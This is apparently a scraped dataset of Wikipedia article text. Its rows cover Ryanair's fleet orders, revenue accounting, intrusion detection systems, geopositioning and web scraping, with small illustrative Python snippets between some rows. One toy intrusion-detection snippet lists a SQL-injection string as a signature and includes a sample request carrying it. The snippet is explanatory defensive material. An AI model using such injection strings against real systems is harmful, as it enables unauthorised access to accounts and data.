294 In July that year, it warned that some of its bases would be subject to short-term closures in 2020, due to the shortfall in MAX deliveries, and pointed out that the MAX 200 version it has ordered will require separate certification expected to take a further two months after the MAX returns to service. 295 In the same month, O'Leary expressed concerns and frustration with the certification delays and revealed that, in parallel with discussions with Boeing regarding a potential order for new aircraft to be delivered from 2023, he was also talking to Airbus which was offering very aggressive pricing. 296 When Boeing builds an aircraft for Ryanair, it is allocated the customer code AS, which appears in its aircraft designation as an infix, such as 737 8AS. citation needed Ryanair's fleet reached 200 aircraft for the first time on 5 September 2009. 297 298 All aircraft in the Ryanair fleet have been retrofitted with performance-enhancing winglets and the more recent deliveries have them fitted as standard. 299 The company also owns four Learjet 45 business jets, based at London Stansted Airport and Bergamo Airport but registered in the Isle of Man, which are mainly used for the quick transportation of maintenance personnel and small aircraft parts around the network. 300 additional citation(s) needed On 13 March 2013, Ryanair signed an order for 175 new Boeing 737 800s. In the press conference announcing the order, Michael O'Leary said Ryanair was still evaluating the possibility of the Boeing 737 MAX and stated its huge order in March was for the Boeing 737 Next Generation rather than the 737 MAX as it needed aircraft before the 737 MAX would enter service. citation needed Ryanair also showed interest in other aircraft, including the Comac C919, when it signed a design agreement with Comac in 2011 to help produce a rival jet to Boeing's offerings. At the Paris Airshow in 2013, Michael O'Leary stated that Comac could build a larger version of the C919 aircraft that would hold up to 200 passengers. 301 On 30 April 2014, Ryanair confirmed that it had ordered five more aircraft to add to its fleet, four of them to be delivered in 2015 and the last one to be delivered in February 2016, to bring the number of aircraft on order to 180. 302 In the summer of 2014, Ryanair contracted AirExplore to operate some of their summer flights between London Stansted and Dublin airport. 303 On 8 September 2014, Ryanair committed to ordering 100 new Boeing 737 MAX 8s (plus options for an additional 100) for delivery in 2019. 100 On 1 December 2014, the airline finalised its order for up to 200 Boeing 737 MAX 200s, a version of the 737 MAX 8 for low-cost airlines, named after the fact that they can carry 200 passengers. The order includes 100 firm and 100 purchase rights. This makes Ryanair the launch customer of the Boeing 737 MAX 200. 304 After delays due to the grounding of the 737 MAX, the first Boeing 737 MAX 200 was finally delivered to Ryanair on 16 June 2021. Twelve deliveries were expected for the summer 2021 season (6 for Ryanair and 6 for Malta Air) and a further 50 by summer 2022. citation needed In July 2021, it was announced that Ryanair had already handed back all of its leased B737s, which were replaced by incoming B737 MAX 200 aircraft. The carrier expects to sell more of its older aircraft in the future. 305 In November 2022 the company announced it would have 124 Boeing 737 MAX 200 by summer 2023, reducing the number of unfulfilled orders to 86 aircraft. 
306 In January 2023, the first Ryanair 737 800 to be retrofitted with split scimitar winglets entered service. The winglets reduce fuel burn by 1.5% and are to be fitted to all existing 737 800 aircraft in the Ryanair fleet. 307 On 30 January 2023, Ryanair Holdings CFO Neil Sorahan said that the Airbus A320 leases had been extended to 2028. 282 On a 10 June 2023 flight from Bologna to Tel Aviv, a cabin crew member announced that the flight would soon be landing in Palestine. Many passengers were upset and the airline later apologised. 323 324 In June 2023, Ryanair fired chief pilot Aidan Murray for sexually harassing female colleagues. 325 |
587 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Revenue | In accounting, revenue is the total amount of income generated by the sale of goods and services related to the primary operations of the business. 1 Commercial revenue may also be referred to as sales or as turnover. Some companies receive revenue from interest, royalties, or other fees. 2 "Revenue" may refer to income in general, or it may refer to the amount, in a monetary unit, earned during a period of time, as in "Last year, company X had revenue of $42 million". Profits or net income generally imply total revenue minus total expenses in a given period. In accounting, revenue is a subsection of the equity section of the balance statement, since it increases equity. It is often referred to as the "top line" due to its position at the very top of the income statement. This is to be contrasted with the "bottom line" which denotes net income (gross revenues minus total expenses). 3 In general usage, revenue is the total amount of income by the sale of goods or services related to the company's operations. Sales revenue is income received from selling goods or services over a period of time. Tax revenue is income that a government receives from taxpayers. Fundraising revenue is income received by a charity from donors etc. to further its social purposes. In more formal usage, revenue is a calculation or estimation of periodic income based on a particular standard accounting practice or the rules established by a government or government agency. Two common accounting methods, cash basis accounting and accrual basis accounting, do not use the same process for measuring revenue. Corporations that offer shares for sale to the public are usually required by law to report revenue based on generally accepted accounting principles or on International Financial Reporting Standards. In a double-entry bookkeeping system, revenue accounts are general ledger accounts that are summarized periodically under the heading "revenue" or "revenues" on an income statement. Revenue account-names describe the type of revenue, such as "repair service revenue", "rent revenue earned" or "sales". 4 For non-profit organizations, revenue may be referred to as gross receipts, support, contributions, etc. 5 This operating revenue can include donations from individuals and corporations, support from government agencies, income from activities related to the organization's mission, income from fundraising activities, and membership dues. Revenue (income and gains) from investments may be categorized as "operating" or "non-operating"—but for many non-profits must (simultaneously) be categorized by fund (along with other accounts). For non-profits with substantial revenue from the dues of their voluntary members: non-dues revenue is revenue generated through means besides association membership fees. This revenue can be found through means of sponsorships, donations or outsourcing the association's digital media outlets. Business revenue is money income from activities that are ordinary for a particular corporation, company, partnership, or sole-proprietorship. For some businesses, such as manufacturing or grocery, most revenue is from the sale of goods. Service businesses such as law firms and barber shops receive most of their revenue from rendering services. Lending businesses such as car rentals and banks receive most of their revenue from fees and interest generated by lending assets to other organizations or individuals. 
Revenues from a business's primary activities are reported as sales, sales revenue or net sales. 2 This includes product returns and discounts for early payment of invoices. Most businesses also have revenue that is incidental to the business's primary activities, such as interest earned on deposits in a demand account. This is included in revenue but not included in net sales. 6 Sales revenue does not include sales tax collected by the business. Other revenue (a.k.a. non-operating revenue) is revenue from peripheral (non-core) operations. For example, a company that manufactures and sells automobiles would record the revenue from the sale of an automobile as "regular" revenue. If that same company also rented a portion of one of its buildings, it would record that revenue as "other revenue" and disclose it separately on its income statement to show that it is from something other than its core operations. The combination of all the revenue-generating systems of a business is called its revenue model. While the current IFRS conceptual framework 7 no longer draws a distinction between revenue and gains, it continues to be drawn at the standard and reporting levels. For example, IFRS 9.5.7.1 states: "A gain or loss on a financial asset or financial liability that is measured at fair value shall be recognised in profit or loss ... while the IASB defined IFRS XBRL taxonomy 8 includes OtherGainsLosses, GainsLossesOnNetMonetaryPosition and similar items. Revenue is a crucial part of financial statement analysis. The company's performance is measured to the extent to which its asset inflows (revenues) compare with its asset outflows (expenses). Net income is the result of this equation, but revenue typically enjoys equal attention during a standard earnings call. If a company displays solid "top-line growth", analysts could view the period's performance as positive even if earnings growth, or "bottom-line growth" is stagnant. Conversely, high net income growth would be tainted if a company failed to produce significant revenue growth. Consistent revenue growth, if accompanied by net income growth, contributes to the value of an enterprise and therefore the share price. Revenue is used as an indication of earnings quality. There are several financial ratios attached to it: Government revenue includes all amounts of money (i.e., taxes and fees) received from sources outside the government entity. Large governments usually have an agency or department responsible for collecting government revenue from companies and individuals. 9 Government revenue may also include reserve bank currency which is printed. This is recorded as an advance to the retail bank together with a corresponding currency in circulation expense entry, that is, the income derived from the Official Cash rate payable by the retail banks for instruments such as 90 day bills. There is a question as to whether using generic business-based accounting standards can give a fair and accurate picture of government accounts, in that with a monetary policy statement to the reserve bank directing a positive inflation rate, the expense provision for the return of currency to the reserve bank is largely symbolic, such that to totally cancel the currency in circulation provision, all currency would have to be returned to the reserve bank and canceled. |
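To make the "top line" versus "bottom line" relationship described in the row above concrete, here is a minimal Python sketch; all of the figures in it are hypothetical and chosen only for illustration.

# Minimal illustration of revenue ("top line") versus net income ("bottom line").
# All figures are hypothetical and chosen only for this example.

def net_income(total_revenue, total_expenses):
    # Net income for a period = total revenue minus total expenses.
    return total_revenue - total_expenses

def growth_rate(current, prior):
    # Period-over-period growth as a fraction, e.g. 0.05 == 5%.
    return (current - prior) / prior

prior_revenue, prior_expenses = 40_000_000, 36_000_000
current_revenue, current_expenses = 42_000_000, 38_500_000

print("Top-line growth:   ", round(growth_rate(current_revenue, prior_revenue), 3))        # 0.05
print("Bottom-line growth:", round(growth_rate(net_income(current_revenue, current_expenses),
                                               net_income(prior_revenue, prior_expenses)), 3))  # -0.125

With these made-up numbers, revenue grows 5% while net income shrinks 12.5%, which is exactly the "solid top-line growth with stagnant or negative bottom-line growth" situation the text describes.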
588 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/File:Question_book-new.svg | Original file (SVG file, nominally 512 × 399 pixels, file size: 13 KB). A new incarnation of Image:Question book 3.svg, uploaded by user AzaToth; created from scratch in Adobe Illustrator, based on Image:Question book.png created by User:Equazcion, May 29, 2008 (Tkgd2007). Licensed under the GFDL (GNU Free Documentation License). |
589 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Intrusion_detection_system | An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. 1 Any intrusion activity or violation is typically either reported to an administrator or collected centrally using a security information and event management (SIEM) system. A SIEM system combines outputs from multiple sources and uses alarm filtering techniques to distinguish malicious activity from false alarms. 2 IDS types range in scope from single computers to large networks. 3 The most common classifications are network intrusion detection systems (NIDS) and host-based intrusion detection systems (HIDS). A system that monitors important operating system files is an example of an HIDS, while a system that analyzes incoming network traffic is an example of an NIDS. It is also possible to classify IDS by detection approach. The most well-known variants are signature-based detection (recognizing bad patterns, such as malware) and anomaly-based detection (detecting deviations from a model of "good" traffic, which often relies on machine learning). Another common variant is reputation-based detection (recognizing the potential threat according to the reputation scores). Some IDS products have the ability to respond to detected intrusions. Systems with response capabilities are typically referred to as an intrusion prevention system (IPS). 4 Intrusion detection systems can also serve specific purposes by augmenting them with custom tools, such as using a honeypot to attract and characterize malicious traffic. 5 Although they both relate to network security, an IDS differs from a firewall in that a conventional network firewall (distinct from a next-generation firewall) uses a static set of rules to permit or deny network connections. It implicitly prevents intrusions, assuming an appropriate set of rules have been defined. Essentially, firewalls limit access between networks to prevent intrusion and do not signal an attack from inside the network. An IDS describes a suspected intrusion once it has taken place and signals an alarm. An IDS also watches for attacks that originate from within a system. This is traditionally achieved by examining network communications, identifying heuristics and patterns (often known as signatures) of common computer attacks, and taking action to alert operators. A system that terminates connections is called an intrusion prevention system, and performs access control like an application layer firewall. 6 IDS can be classified by where detection takes place (network or host) or the detection method that is employed (signature or anomaly-based). 7 Network intrusion detection systems (NIDS) are placed at a strategic point or points within the network to monitor traffic to and from all devices on the network. 8 It performs an analysis of passing traffic on the entire subnet, and matches the traffic that is passed on the subnets to the library of known attacks. Once an attack is identified, or abnormal behavior is sensed, the alert can be sent to the administrator. NIDS function to safeguard every device and the entire network from unauthorized access. 9 An example of an NIDS would be installing it on the subnet where firewalls are located in order to see if someone is trying to break into the firewall. 
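As a rough illustration of the signature-based detection idea mentioned above (matching observed traffic against a library of known bad patterns), here is a minimal Python sketch; the signature names, byte patterns, and sample payloads are invented placeholders rather than real attack signatures.

# Toy signature-based detection: match raw payloads against a library of known bad byte patterns.
# The signature names, patterns and sample payloads below are invented placeholders.

SIGNATURES = {
    "example-nop-sled-marker": b"\x90\x90\x90\x90\xcc",
    "example-sql-injection": b"' OR '1'='1",
}

def match_signatures(payload):
    # Return the names of every known signature found inside the payload.
    return [name for name, pattern in SIGNATURES.items() if pattern in payload]

samples = [
    b"GET /index.html HTTP/1.1",                # benign request
    b"username=admin&password=' OR '1'='1",     # contains the toy SQL-injection pattern
]
for sample in samples:
    hits = match_signatures(sample)
    print(sample, "->", hits if hits else "no match")

Real NIDS engines apply far larger rule sets and track protocol state, but the core per-packet matching step has roughly this shape.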
Ideally one would scan all inbound and outbound traffic, however doing so might create a bottleneck that would impair the overall speed of the network. OPNET and NetSim are commonly used tools for simulating network intrusion detection systems. NID Systems are also capable of comparing signatures for similar packets to link and drop harmful detected packets which have a signature matching the records in the NIDS. When we classify the design of the NIDS according to the system interactivity property, there are two types: on-line and off-line NIDS, often referred to as inline and tap mode, respectively. On-line NIDS deals with the network in real time. It analyses the Ethernet packets and applies some rules, to decide if it is an attack or not. Off-line NIDS deals with stored data and passes it through some processes to decide if it is an attack or not. NIDS can be also combined with other technologies to increase detection and prediction rates. Artificial Neural Network (ANN) based IDS are capable of analyzing huge volumes of data due to the hidden layers and non-linear modeling, however this process requires time due its complex structure. 10 This allows IDS to more efficiently recognize intrusion patterns. 11 Neural networks assist IDS in predicting attacks by learning from mistakes; ANN based IDS help develop an early warning system, based on two layers. The first layer accepts single values, while the second layer takes the first's layers output as input; the cycle repeats and allows the system to automatically recognize new unforeseen patterns in the network. 12 This system can average 99.9% detection and classification rate, based on research results of 24 network attacks, divided in four categories: DOS, Probe, Remote-to-Local, and user-to-root. 13 Host intrusion detection systems (HIDS) run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets from the device only and will alert the user or administrator if suspicious activity is detected. It takes a snapshot of existing system files and matches it to the previous snapshot. If the critical system files were modified or deleted, an alert is sent to the administrator to investigate. An example of HIDS usage can be seen on mission critical machines, which are not expected to change their configurations. 14 15 Signature-based IDS is the detection of attacks by looking for specific patterns, such as byte sequences in network traffic, or known malicious instruction sequences used by malware. 16 This terminology originates from anti-virus software, which refers to these detected patterns as signatures. Although signature-based IDS can easily detect known attacks, it is difficult to detect new attacks, for which no pattern is available. 17 In signature-based IDS, the signatures are released by a vendor for all its products. On-time updating of the IDS with the signature is a key aspect. Anomaly-based intrusion detection systems were primarily introduced to detect unknown attacks, in part due to the rapid development of malware. The basic approach is to use machine learning to create a model of trustworthy activity, and then compare new behavior against this model. Since these models can be trained according to the applications and hardware configurations, machine learning based method has a better generalized property in comparison to traditional signature-based IDS. 
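The anomaly-based approach described above boils down to "learn a baseline of normal activity, then flag large deviations". The following minimal Python sketch uses a simple mean and standard deviation threshold over hypothetical requests-per-minute counts; production systems use far richer models, but the shape of the logic is the same.

# Toy anomaly-based detection: learn a baseline from "normal" traffic counts,
# then flag new observations that deviate by more than k standard deviations.
# The training counts and test values are hypothetical.
import statistics

def fit_baseline(normal_counts):
    return statistics.mean(normal_counts), statistics.pstdev(normal_counts)

def is_anomalous(value, mean, std, k=3.0):
    if std == 0:
        return value != mean
    return abs(value - mean) > k * std

training = [52, 48, 50, 47, 53, 49, 51, 50]   # requests per minute during a quiet window
mean, std = fit_baseline(training)

for observed in [51, 55, 240]:                # 240 simulates a sudden burst, e.g. a scan or flood
    print(observed, "anomalous" if is_anomalous(observed, mean, std) else "normal")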
Although this approach enables the detection of previously unknown attacks, it may suffer from false positives: previously unknown legitimate activity may also be classified as malicious. Most of the existing IDSs suffer from the time-consuming during detection process that degrades the performance of IDSs. Efficient feature selection algorithm makes the classification process used in detection more reliable. 18 New types of what could be called anomaly-based intrusion detection systems are being viewed by Gartner as User and Entity Behavior Analytics (UEBA) 19 (an evolution of the user behavior analytics category) and network traffic analysis (NTA). 20 In particular, NTA deals with malicious insiders as well as targeted external attacks that have compromised a user machine or account. Gartner has noted that some organizations have opted for NTA over more traditional IDS. 21 Some systems may attempt to stop an intrusion attempt but this is neither required nor expected of a monitoring system. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, and reporting attempts. In addition, organizations use IDPS for other purposes, such as identifying problems with security policies, documenting existing threats and deterring individuals from violating security policies. IDPS have become a necessary addition to the security infrastructure of nearly every organization. 22 IDPS typically record information related to observed events, notify security administrators of important observed events and produce reports. Many IDPS can also respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g. reconfiguring a firewall) or changing the attack's content. 22 Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, report it and attempt to block or stop it. 23 . Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block intrusions that are detected. 24 : 273 25 : 289 IPS can take such actions as sending an alarm, dropping detected malicious packets, resetting a connection or blocking traffic from the offending IP address. 26 An IPS also can correct cyclic redundancy check (CRC) errors, defragment packet streams, mitigate TCP sequencing issues, and clean up unwanted transport and network layer options. 24 : 278 27 Intrusion prevention systems can be classified into four different types: 23 28 The majority of intrusion prevention systems utilize one of three detection methods: signature-based, statistical anomaly-based, and stateful protocol analysis. 25 : 301 29 The correct placement of intrusion detection systems is critical and varies depending on the network. The most common placement is behind the firewall, on the edge of a network. 
This practice provides the IDS with high visibility of traffic entering your network and will not receive any traffic between users on the network. The edge of the network is the point in which a network connects to the extranet. Another practice that can be accomplished if more resources are available is a strategy where a technician will place their first IDS at the point of highest visibility and depending on resource availability will place another at the next highest point, continuing that process until all points of the network are covered. 34 If an IDS is placed beyond a network's firewall, its main purpose would be to defend against noise from the internet but, more importantly, defend against common attacks, such as port scans and network mapper. An IDS in this position would monitor layers 4 through 7 of the OSI model and would be signature-based. This is a very useful practice, because rather than showing actual breaches into the network that made it through the firewall, attempted breaches will be shown which reduces the amount of false positives. The IDS in this position also assists in decreasing the amount of time it takes to discover successful attacks against a network. 35 Sometimes an IDS with more advanced features will be integrated with a firewall in order to be able to intercept sophisticated attacks entering the network. Examples of advanced features would include multiple security contexts in the routing level and bridging mode. All of this in turn potentially reduces cost and operational complexity. 35 Another option for IDS placement is within the actual network. These will reveal attacks or suspicious activity within the network. Ignoring the security within a network can cause many problems, it will either allow users to bring about security risks or allow an attacker who has already broken into the network to roam around freely. Intense intranet security makes it difficult for even those hackers within the network to maneuver around and escalate their privileges. 35 There are a number of techniques which attackers are using, the following are considered 'simple' measures which can be taken to evade IDS: The earliest preliminary IDS concept was delineated in 1980 by James Anderson at the National Security Agency and consisted of a set of tools intended to help administrators review audit trails. 39 User access logs, file access logs, and system event logs are examples of audit trails. Fred Cohen noted in 1987 that it is impossible to detect an intrusion in every case, and that the resources needed to detect intrusions grow with the amount of usage. 40 Dorothy E. Denning, assisted by Peter G. Neumann, published a model of an IDS in 1986 that formed the basis for many systems today. 41 Her model used statistics for anomaly detection, and resulted in an early IDS at SRI International named the Intrusion Detection Expert System (IDES), which ran on Sun workstations and could consider both user and network level data. 42 IDES had a dual approach with a rule-based Expert System to detect known types of intrusions plus a statistical anomaly detection component based on profiles of users, host systems, and target systems. The author of "IDES: An Intelligent System for Detecting Intruders", Teresa F. Lunt, proposed adding an artificial neural network as a third component. She said all three components could then report to a resolver. SRI followed IDES in 1993 with the Next-generation Intrusion Detection Expert System (NIDES). 
43 The Multics intrusion detection and alerting system (MIDAS), an expert system using P-BEST and Lisp, was developed in 1988 based on the work of Denning and Neumann. 44 Haystack was also developed in that year using statistics to reduce audit trails. 45 In 1986 the National Security Agency started an IDS research transfer program under Rebecca Bace. Bace later published the seminal text on the subject, Intrusion Detection, in 2000. 46 Wisdom Sense (W S) was a statistics-based anomaly detector developed in 1989 at the Los Alamos National Laboratory. 47 W S created rules based on statistical analysis, and then used those rules for anomaly detection. In 1990, the Time-based Inductive Machine (TIM) did anomaly detection using inductive learning of sequential user patterns in Common Lisp on a VAX 3500 computer. 48 The Network Security Monitor (NSM) performed masking on access matrices for anomaly detection on a Sun 3 50 workstation. 49 The Information Security Officer's Assistant (ISOA) was a 1990 prototype that considered a variety of strategies including statistics, a profile checker, and an expert system. 50 ComputerWatch at AT T Bell Labs used statistics and rules for audit data reduction and intrusion detection. 51 Then, in 1991, researchers at the University of California, Davis created a prototype Distributed Intrusion Detection System (DIDS), which was also an expert system. 52 The Network Anomaly Detection and Intrusion Reporter (NADIR), also in 1991, was a prototype IDS developed at the Los Alamos National Laboratory's Integrated Computing Network (ICN), and was heavily influenced by the work of Denning and Lunt. 53 NADIR used a statistics-based anomaly detector and an expert system. The Lawrence Berkeley National Laboratory announced Bro in 1998, which used its own rule language for packet analysis from libpcap data. 54 Network Flight Recorder (NFR) in 1999 also used libpcap. 55 APE was developed as a packet sniffer, also using libpcap, in November, 1998, and was renamed Snort one month later. Snort has since become the world's largest used IDS IPS system with over 300,000 active users. 56 It can monitor both local systems, and remote capture points using the TZSP protocol. The Audit Data Analysis and Mining (ADAM) IDS in 2001 used tcpdump to build profiles of rules for classifications. 57 In 2003, Yongguang Zhang and Wenke Lee argue for the importance of IDS in networks with mobile nodes. 58 In 2015, Viegas and his colleagues 59 proposed an anomaly-based intrusion detection engine, aiming System-on-Chip (SoC) for applications in Internet of Things (IoT), for instance. The proposal applies machine learning for anomaly detection, providing energy-efficiency to a Decision Tree, Naive-Bayes, and k-Nearest Neighbors classifiers implementation in an Atom CPU and its hardware-friendly implementation in a FPGA. 60 61 In the literature, this was the first work that implement each classifier equivalently in software and hardware and measures its energy consumption on both. Additionally, it was the first time that was measured the energy consumption for extracting each features used to make the network packet classification, implemented in software and hardware. 62 This article incorporates public domain material from Karen Scarfone, Peter Mell. Guide to Intrusion Detection and Prevention Systems, SP800 94 (PDF). National Institute of Standards and Technology. Retrieved 1 January 2010. |
590 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Security-focused_operating_system | This is a list of operating systems specifically focused on security. Similar concepts include security-evaluated operating systems that have achieved certification from an auditing organization, and trusted operating systems that provide sufficient support for multilevel security and evidence of correctness to meet a particular set of requirements. |
591 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Geolocation | Geopositioning is the process of determining or estimating the geographic position of an object. 1 Geopositioning yields a set of geographic coordinates (such as latitude and longitude) in a given map datum; positions may also be expressed as a bearing and range from a known landmark. In turn, positions can determine a meaningful location, such as a street address. Specific instances include: animal geotracking, the process of inferring the location of animals over time; positioning system, the mechanisms for the determination of geographic positions in general; internet geolocation, geolocating a device connected to the internet; and mobile phone tracking. 2 Geopositioning uses various visual and electronic methods including position lines and position circles, celestial navigation, radio navigation, and the use of satellite navigation systems. The calculation requires measurements or observations of distances or angles to reference points whose positions are known. In 2D surveys, observations of three reference points are enough to compute a position in a two-dimensional plane. In practice, observations are subject to errors resulting from various physical and atmospheric factors that influence the measurement of distances and angles. 3 A practical example of obtaining a position fix would be for a ship to take bearing measurements on three lighthouses positioned along the coast. These measurements could be made visually using a hand bearing compass, or in case of poor visibility, electronically using radar or radio direction finding. Since all physical observations are subject to errors, the resulting position fix is also subject to inaccuracy. Although in theory two lines of position (LOP) are enough to define a point, in practice 'crossing' more LOPs provides greater accuracy and confidence, especially if the lines cross at a good angle to each other. Three LOPs are considered the minimum for a practical navigational fix. 4 The three LOPs when drawn on the chart will in general form a triangle, known as a 'cocked hat'. The navigator will have more confidence in a position fix that is formed by a small cocked hat with angles close to those of an equilateral triangle. 5 The area of doubt surrounding a position fix is called an error ellipse. To minimize the error, electronic navigation systems generally use more than three reference points to compute a position fix to increase the data redundancy. As more redundant reference points are added, the position fix becomes more accurate and the area of the resulting error ellipse decreases. 6 The process of combining multiple observations to compute a position fix is equivalent to solving a system of linear equations. Navigation systems use regression algorithms such as least squares in order to compute a position fix in 3D space. This is most commonly done by combining distance measurements to 4 or more GPS satellites, which orbit the Earth along known paths. 7 The result of position fixing is called a position fix (PF), or simply a fix, a position derived from measuring in relation to external reference points. 8 In nautical navigation, the term is generally used with manual or visual techniques, such as the use of intersecting visual or radio position lines, rather than the use of more automated and accurate electronic methods like GPS; in aviation, use of electronic navigation aids is more common. 
A visual fix can be made by using any sighting device with a bearing indicator. Two or more objects of known position are sighted, and the bearings recorded. Bearing lines are then plotted on a chart through the locations of the sighted items. The intersection of these lines is the current position of the vessel. Usually, a fix is where two or more position lines intersect at any given time. If three position lines can be obtained, the resulting "cocked hat", where the three lines do not intersect at the same point, but create a triangle, gives the navigator an indication of the accuracy. The most accurate fixes occur when the position lines are perpendicular to each other. Fixes are a necessary aspect of navigation by dead reckoning, which relies on estimates of speed and course. The fix confirms the actual position during a journey. A fix can introduce inaccuracies if the reference point is not correctly identified or is inaccurately measured. |
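The least-squares position fix described in the row above can be sketched in a few lines of Python. The beacon coordinates and the true position below are invented for the example, and the code solves only the 2D case; GPS receivers solve the analogous 3D problem with an extra clock-bias unknown.

# Minimal 2D least-squares position fix from range measurements to known reference points.
# The beacon coordinates and the true position are invented for this example.
import numpy as np

def position_fix(beacons, ranges):
    # Linearise the range equations against the first beacon and solve the
    # resulting overdetermined linear system with least squares.
    (x0, y0), r0 = beacons[0], ranges[0]
    A, b = [], []
    for (xi, yi), ri in zip(beacons[1:], ranges[1:]):
        A.append([2 * (xi - x0), 2 * (yi - y0)])
        b.append(r0**2 - ri**2 + xi**2 - x0**2 + yi**2 - y0**2)
    solution, *_ = np.linalg.lstsq(np.array(A), np.array(b), rcond=None)
    return solution

beacons = np.array([[0.0, 0.0], [10.0, 0.0], [0.0, 10.0], [10.0, 10.0]])
true_position = np.array([3.0, 4.0])
ranges = np.linalg.norm(beacons - true_position, axis=1)  # exact ranges; real measurements are noisy
print("Estimated position:", position_fix(beacons, ranges))  # approximately [3. 4.]

Using four beacons rather than the minimum three gives the redundancy the text mentions: with noisy ranges, the extra observations shrink the error ellipse around the estimated fix.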
592 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-13 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
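The regular-expression approach to extraction mentioned in the row above can be illustrated with a short Python sketch; the HTML fragment and the pattern are invented for the example, and for real pages an HTML parser such as BeautifulSoup is usually the more robust choice.

# Toy regex-based extraction from an HTML fragment (illustrative only; for real pages
# an HTML parser such as BeautifulSoup is usually more robust than regular expressions).
import re

html = """
<ul>
  <li><a href="/flights/dublin">Dublin</a> <span class="price">$49</span></li>
  <li><a href="/flights/madrid">Madrid</a> <span class="price">$79</span></li>
</ul>
"""

pattern = re.compile(
    r'<a href="(?P<url>[^"]+)">(?P<city>[^<]+)</a>\s*'
    r'<span class="price">\$(?P<price>\d+)</span>'
)

for match in pattern.finditer(html):
    print(match.group("city"), match.group("url"), int(match.group("price")))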
